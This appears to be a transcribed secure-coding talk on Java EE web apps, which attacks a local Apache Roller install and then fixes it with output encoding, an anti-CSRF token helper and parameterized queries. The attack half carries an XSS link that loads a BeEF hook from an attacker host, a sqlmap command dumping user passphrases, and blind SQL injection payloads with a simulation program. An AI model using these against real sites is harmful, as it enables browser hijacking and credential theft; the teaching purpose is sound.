
Securing Java EE Web Apps


1. Securing Java EE Web Apps
   - Frank Kim
   - Principal, ThinkSec
   - Author, SANS Institute

2. About
   - Frank Kim
     - Consultant, ThinkSec
     - Author, SANS Secure Coding in Java/JEE
     - SANS Application Security Curriculum Lead

3. What You Should Know
   - Hacking is not hard
   - Don't trust any data
     - Assume that your users are evil!

4. Outline
   - Web App Attack Refresher
     - XSS, CSRF, SQL Injection
   - Testing
     - Hacking an open source app
   - Secure Coding
     - Fixing security bugs

5. Cross-Site Scripting (XSS)
   - Occurs when untrusted data is written into a page without being encoded for the context it lands in, so the browser treats it as markup or script instead of as data
   - Types of XSS
     - Stored
     - Reflected
     - Document Object Model (DOM) based

6. Cross-Site Request Forgery (CSRF)
   - (Slide is a diagram.) The attacker gets the victim's browser, which already carries a valid session cookie, to send a state-changing request that the attacker chose

7. SQL Injection (SQLi)
   - Occurs when untrusted data is concatenated into a dynamic SQL query string
     - By injecting arbitrary SQL, attackers can extend the meaning of the original query
     - Can potentially execute any SQL statement on the database
   - Very powerful
     - #1 on the CWE/SANS Top 25 Most Dangerous Software Errors
     - #1 on the OWASP Top 10 (as Injection)

8. Outline
   - Web App Attack Refresher
     - XSS, CSRF, SQL Injection
   - Testing
     - Hacking an open source app
   - Secure Coding
     - Fixing security bugs

9. What are We Testing?
   - Installation of Roller 3.0 (the Apache Roller blog server)
   - Fake install of the SANS AppSec Street Fighter Blog
   - Want to simulate the actions that a real attacker might take
     - There are definitely other avenues of attack
     - We're walking through one attack scenario

10. Attack Scenario
   - XSS to control the victim's browser
   - Combine XSS and CSRF to conduct a privilege escalation attack
     - Use the escalated privileges to access another feature
   - Use SQL Injection to access the database directly
11. Spot the Vuln - XSS
   - (Slide shows source code; the vulnerable line is on the next slide)

12. XSS in head.jsp
   - (Slide shows the line in head.jsp where the "look" request parameter is written into the theme stylesheet href without encoding)

13. Testing the "look" Param
   - Admin pages include head.jsp
   - The param is persistent for the session, so one poisoned request keeps firing on every admin page the victim visits afterwards

14. XSS Exploitation
   - Introducing BeEF
     - Browser Exploitation Framework
     - http://www.bindshell.net/tools/beef
   - Uses XSS to hook the victim's browser
     - Log user keystrokes, view browsing history, execute JavaScript, etc.
     - Advanced attacks: Metasploit integration, browser exploits, etc.

15. XSS Exploitation Overview
   1) Attacker sends the victim a link carrying the evil BeEF hook script:
      http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
      (the leading "> closes the href attribute and the <link> tag, then the <script> tag loads the hook)
   2) Victim clicks the evil link
   3) Victim's browser sends data to the attacker

16. BeEF XSS Demo

17. Spot the Vuln - CSRF

18. CSRF in UserAdmin.jsp
   - Want to use CSRF to change this field (slide shows the UserAdmin.jsp form)

19. CSRF Demo

20. Spot the Vuln - SQL Injection

21. SQL Injection in UserServlet

22. SQL Injection Testing
   - UserServlet is vulnerable to SQLi
     - http://localhost:8080/roller/roller-ui/authoring/user
   - (Screenshot: the response to the injected request reads "No results")

23. Exploiting SQL Injection
   - Introducing sqlmap
     - http://sqlmap.sourceforge.net
   - Tool that automates detection and exploitation of SQL Injection vulns
     - Supports MySQL, Oracle, PostgreSQL, MS SQL Server
     - Supports blind, in-band, and batched queries
     - Fingerprinting/enumeration: dump db schemas, table/column names, data, db users, etc.
     - Takeover features: read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc.

24. sqlmap Syntax
   - Dump userids and passwords:

       python sqlmap.py \
         -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" \
         --cookie "username=test; JSESSIONID=<INSERT HERE>" \
         --drop-set-cookie -p startsWith \
         --dump -T rolleruser -C username,passphrase -v 2

   - --cookie supplies the attacker's own authenticated session, since the endpoint sits behind login; --drop-set-cookie stops sqlmap from replacing it with any Set-Cookie the server sends back; -p limits testing to the startsWith parameter

25. SQL Injection Demo
26. How it Works
   - sqlmap's boolean-based blind payloads, as sent in startsWith (each closes the LIKE string, appends a true/false condition, then re-balances the quotes):

       f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
       f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
       f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

   - The page either lists users (condition true) or says "No results" (condition false); that single bit per request is all the attacker needs

27. Step By Step [0]
   - The innermost query picks one row (LIMIT 2, 1 skips two rows and returns the third); IFNULL(..., CHAR(32)) turns a NULL passphrase into a space so the later comparison still has a character:

       SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

     returns ilovethetajmahal

28. Step By Step [1]
   - MID(value, position, 1) pulls out one character at a time:

       select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);

     returns i

       select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);

     returns l

       select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);

     returns o

29. Step By Step [2]
   - ORD() turns each character into a number that can be compared with > in the injected condition:

       select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));

     returns 105

       select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));

     returns 108

       select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));

     returns 111

   - So "> 103" is true, "> 104" is true and "> 105" is false, which pins the first character at 105, i.e. 'i'
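The three "> 103 / > 104 / > 105" queries are the tail of a binary search: sqlmap has already narrowed ORD(MID(...)) to a small range, and those answers fix the first character at 105. The Java program below, added here as an example and not taken from the talk or from Apache Roller, runs that search end to end against a constructed in-memory stand-in for roller.rolleruser: oracle() plays the vulnerable UserServlet and answers only "results" or "No results", and recoverRow() rebuilds the passphrase that LIMIT 2, 1 selects, seven requests per character. The sample rows, the class and the method names are assumptions.

```java
import java.util.ArrayList;
import java.util.List;

/**
 * Boolean-based blind extraction, the way sqlmap pulls the passphrase column
 * one character at a time. Example code, not from the talk or Apache Roller.
 */
public class BlindExtractionDemo {

    // Constructed stand-in for roller.rolleruser in the order the database
    // would return rows; "LIMIT 2, 1" picks index 2, the third row.
    static final String[] ROWS = { "hunter2", "correct-horse", "ilovethetajmahal" };

    /**
     * Simulates what the vulnerable UserServlet answers for
     *   f%' AND ORD(MID((SELECT ... LIMIT row, 1), pos, 1)) > n AND 'neEy' LIKE 'neEy
     * The attacker only sees whether the page lists users (true) or says
     * "No results" (false). MySQL's MID() past the end of the string is '',
     * and ORD('') is 0, so a recovered 0 means the value has ended.
     */
    static boolean oracle(int row, int pos, int n) {
        String value = ROWS[row];
        int ord = pos <= value.length() ? value.charAt(pos - 1) : 0;
        return ord > n;
    }

    /** Binary-searches one character code in [0, 127] using only "> n" answers. */
    static int recoverChar(int row, int pos, List<String> log) {
        int lo = 0, hi = 127;                 // 7-bit ASCII, 7 requests per character
        while (lo < hi) {
            int mid = (lo + hi) / 2;
            log.add(String.format("ORD(MID(..., %d, 1)) > %d", pos, mid));
            if (oracle(row, pos, mid)) {
                lo = mid + 1;                 // true: the character is above mid
            } else {
                hi = mid;                     // false: the character is at most mid
            }
        }
        return lo;
    }

    /** Recovers one row's value, stopping at the ORD() == 0 end-of-string sentinel. */
    static String recoverRow(int row, List<String> log) {
        StringBuilder out = new StringBuilder();
        for (int pos = 1; ; pos++) {
            int c = recoverChar(row, pos, log);
            if (c == 0) {
                break;
            }
            out.append((char) c);
        }
        return out.toString();
    }

    public static void main(String[] args) {
        List<String> log = new ArrayList<>();
        String recovered = recoverRow(2, log);           // the row "LIMIT 2, 1" selects
        System.out.println("recovered: " + recovered);   // ilovethetajmahal
        System.out.println("requests:  " + log.size()); // 7 per character plus 7 for the sentinel
        for (String q : log.subList(0, 7)) {             // the search for the first character
            System.out.println("  " + q);
        }
    }
}
```

The last three probes printed for the first character are "> 103", "> 104" and "> 105", matching the payloads on slide 26. A 16-character passphrase costs 17 * 7 = 119 requests, which is why blind extraction is slow but entirely practical, and why the only real answer is to stop the query from being built from user input at all.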
30. Attack Summary
   - XSS to control the victim's browser
   - Combine XSS and CSRF to conduct a privilege escalation attack
     - Use the escalated privileges to access another feature
   - Use SQL Injection to access the database directly

31. Outline
   - Web App Attack Refresher
     - XSS, CSRF, SQL Injection
   - Testing
     - Hacking an open source app
   - Secure Coding
     - Fixing security bugs
32. Data Validation
   - (Slide is a diagram.) Inbound data is validated on its way into the application ("Should I be consuming this?"); outbound data is encoded on its way out to the browser ("Should I be emitting this?"). The same two steps, validation and encoding, apply in both directions at the boundary between the application and its data store.

33. Output Encoding
   - Encoding
     - Convert characters so they are treated as data and not as special characters
   - Must escape differently depending on where on the page the data is displayed (HTML body, HTML attribute, URL, JavaScript and CSS each have their own rules)
   - XSS Prevention Cheat Sheet
     - http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

34. Fix XSS in head.jsp
   - Add URL encoding:

       <link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

   - encodeForURL percent-encodes everything outside the unreserved set, so the ", < and > in the "look" payload can no longer close the href attribute or start a tag
   - Since only the installed themes are valid values, also reject any theme name that is not on that list (whitelist) before it reaches the page; encoding makes the output safe, validation makes the input meaningful

35. Fix CSRF
   - UserAdmin.jsp
     - Add anti-CSRF token (attribute values quoted so an unexpected character in the token cannot break the tag):

       <input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>" />

   - UserAdminAction.java
     - Check anti-CSRF token:

       if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
           return mapping.findForward("error");
       }

   - getSession(false) returns null when no session exists, so isValid must treat a null session, a missing parameter or a mismatch as invalid rather than throw
   - The token is read from the form by same-origin script, which is exactly what the XSS on slide 12 gives the attacker; the token only protects UserAdmin.jsp once that XSS is fixed too
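The slide names CSRFTokenUtil but does not show it. Below is one way to write it, added here as an example: it is not the helper used in the talk and not part of Apache Roller, and everything other than the three names the slide relies on (SESSION_ATTR_KEY, getToken, isValid) is an assumption. The token is 256 random bits from SecureRandom, minted once per session, sent as the form field named SESSION_ATTR_KEY (as the JSP above does), and compared with MessageDigest.isEqual so the comparison does not stop at the first differing byte.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

/**
 * Per-session anti-CSRF token helper. Example code, not the talk's helper
 * and not part of Apache Roller; only the three public names come from the slide.
 */
public final class CSRFTokenUtil {

    /** Session attribute key, and also the request parameter name the form uses. */
    public static final String SESSION_ATTR_KEY = "csrfToken";

    private static final SecureRandom RNG = new SecureRandom();

    private CSRFTokenUtil() {
    }

    /**
     * Returns the session's token, minting one on first use. Synchronizing on
     * the session stops two concurrent requests from minting two different tokens.
     * A null session is an error here: the token must be bound to an
     * authenticated session, and the admin JSPs are only reachable with one.
     */
    public static String getToken(HttpSession session) {
        if (session == null) {
            throw new IllegalStateException("no session to bind the CSRF token to");
        }
        synchronized (session) {
            String token = (String) session.getAttribute(SESSION_ATTR_KEY);
            if (token == null) {
                byte[] raw = new byte[32];               // 256 bits of entropy
                RNG.nextBytes(raw);
                // URL-safe Base64 without padding: only [A-Za-z0-9_-], safe in a quoted attribute
                token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
                session.setAttribute(SESSION_ATTR_KEY, token);
            }
            return token;
        }
    }

    /**
     * Accepts the request only when the submitted token equals the session's.
     * No session, no stored token, no submitted token, or a mismatch all fail closed.
     */
    public static boolean isValid(HttpSession session, HttpServletRequest req) {
        if (session == null) {
            return false;
        }
        String expected = (String) session.getAttribute(SESSION_ATTR_KEY);
        String submitted = req.getParameter(SESSION_ATTR_KEY);
        if (expected == null || submitted == null) {
            return false;
        }
        // MessageDigest.isEqual does not short-circuit on the first differing byte
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     submitted.getBytes(StandardCharsets.UTF_8));
    }
}
```

Because the token lives in the session, a forged cross-site POST cannot supply it: the attacker's page can neither read the victim's session attribute nor the hidden field of a page it did not load from the same origin. The check belongs in every state-changing action, not only UserAdminAction.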
36. Fix SQL Injection
   - Use parameterized queries correctly:

       if (startsWith == null || startsWith.equals("")) {
           query = "SELECT username, emailaddress FROM rolleruser";
           stmt = con.prepareStatement(query);
       } else {
           query = "SELECT username, emailaddress FROM rolleruser "
                 + "WHERE username like ? or emailaddress like ? ";
           stmt = con.prepareStatement(query);
           stmt.setString(1, startsWith + "%");
           stmt.setString(2, startsWith + "%");
       }
       rs = stmt.executeQuery();

   - The user's input is now bound as a value and is never parsed as SQL, so the quote-closing payloads from slide 26 match nothing instead of changing the query
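The parameterized query above closes the injection. One thing a reviewer would still flag is that startsWith is bound inside a LIKE pattern, where % and _ remain wildcards: startsWith=% lists every user, which is exactly what the sqlmap request on slide 24 (startsWith=f%25) relied on. The class below, added here as an example and not the talk's or Roller's code, keeps the slide's query, table and column names and adds an escaping helper plus an ESCAPE clause so the input only ever matches itself. The class name, the '!' escape character and the findUsers method are assumptions; it needs a live JDBC Connection to run.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

/**
 * Parameterized prefix search over rolleruser with LIKE metacharacters escaped.
 * Example code, not from the talk or Apache Roller.
 */
public class UserLookup {

    static final String ALL_USERS =
        "SELECT username, emailaddress FROM rolleruser";

    // '!' is declared as the escape character so the query is portable across
    // MySQL, PostgreSQL, Oracle and SQL Server (a backslash would need DB-specific quoting).
    static final String USERS_STARTING_WITH =
        "SELECT username, emailaddress FROM rolleruser"
      + " WHERE username LIKE ? ESCAPE '!' OR emailaddress LIKE ? ESCAPE '!'";

    /**
     * Binding the value stops SQL injection, but inside a LIKE pattern the
     * characters % and _ are still wildcards. Prefix them (and the escape
     * character itself) with '!' so the user's text matches only literally.
     */
    static String escapeLike(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 8);
        for (char c : s.toCharArray()) {
            if (c == '!' || c == '%' || c == '_') {
                sb.append('!');
            }
            sb.append(c);
        }
        return sb.toString();
    }

    /** The bound pattern: escaped user prefix followed by the one wildcard we actually mean. */
    static String prefixPattern(String startsWith) {
        return escapeLike(startsWith) + "%";
    }

    /** Returns {username, emailaddress} rows whose username or email starts with the given text. */
    static List<String[]> findUsers(Connection con, String startsWith) throws SQLException {
        List<String[]> rows = new ArrayList<>();
        boolean all = startsWith == null || startsWith.isEmpty();
        try (PreparedStatement stmt = con.prepareStatement(all ? ALL_USERS : USERS_STARTING_WITH)) {
            if (!all) {
                String pattern = prefixPattern(startsWith);
                stmt.setString(1, pattern);   // bound as data, never parsed as SQL
                stmt.setString(2, pattern);
            }
            try (ResultSet rs = stmt.executeQuery()) {
                while (rs.next()) {
                    rows.add(new String[] { rs.getString(1), rs.getString(2) });
                }
            }
        }
        return rows;
    }

    public static void main(String[] args) {
        // Constructed inputs showing what gets bound: the injection payload from
        // slide 26 becomes a literal prefix, and a bare "%" no longer matches everyone.
        System.out.println(prefixPattern("f%' AND 1=1 AND 'neEy' LIKE 'neEy"));  // f!%' AND 1=1 AND 'neEy' LIKE 'neEy%
        System.out.println(prefixPattern("%"));                                    // !%%
        System.out.println(prefixPattern("admin_"));                               // admin!_%
    }
}
```

Whether listing all users on an empty prefix is acceptable at all is an authorization question for UserServlet, not something the query can settle; the point here is only that the shape of the query is fixed before any user data arrives.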
37. Building Secure Software
   - (Figure: the Microsoft SDL phases. Source: Microsoft SDL)

38. Remember
   - Hacking is not hard
   - Don't trust any data
     - Validate input
       - Prefer whitelists
       - Use an authenticity token
     - Encode output
       - Contextual encoding
       - Use parameterized queries

39. SANS Software Security
   - SANS AppSec 2012
     - April 30 - May 1 in Las Vegas
     - CFP is open now!
     - http://sans.org/appsec-2012
   - New courses
     - DEV551 Secure iOS Development
     - DEV568 Secure Android Development
   - Free resources
     - Top 25, blog, white papers, webcasts, and more at
     - http://software-security.sans.org
   - Discount
     - Save 10% using the discount code DEVOXX. Enterprise pricing available.

40. Thanks!
   - Frank Kim
   - [email_address] @sansappsec
